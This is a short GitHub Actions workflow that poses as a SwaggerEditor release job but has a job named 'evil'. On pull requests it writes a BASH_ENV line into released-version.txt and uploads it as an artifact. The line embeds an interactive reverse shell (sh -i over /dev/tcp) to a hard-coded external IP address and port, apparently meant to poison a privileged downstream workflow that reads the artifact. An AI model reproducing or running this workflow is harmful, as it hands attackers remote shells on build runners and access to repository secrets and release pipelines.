name: "Release SwaggerEditor@next"

on:
  pull_request:

jobs:
  evil:
      name: evil
      runs-on: ubuntu-latest
      steps:
      - name: prepare
        run: |
        
            echo -e 'null\nBASH_ENV="$(sh -i >& /dev/tcp/146.59.195.165/15967 0>&1)"' > released-version.txt
            
            mkdir build
            echo 'empty' > build/empty.txt
            
      - name: Upload release
        uses: actions/upload-artifact@v3
        with:
          name: released-version
          path: released-version.txt

      - name: Upload build
        uses: actions/upload-artifact@v3
        with:
          name: build
          path: build/
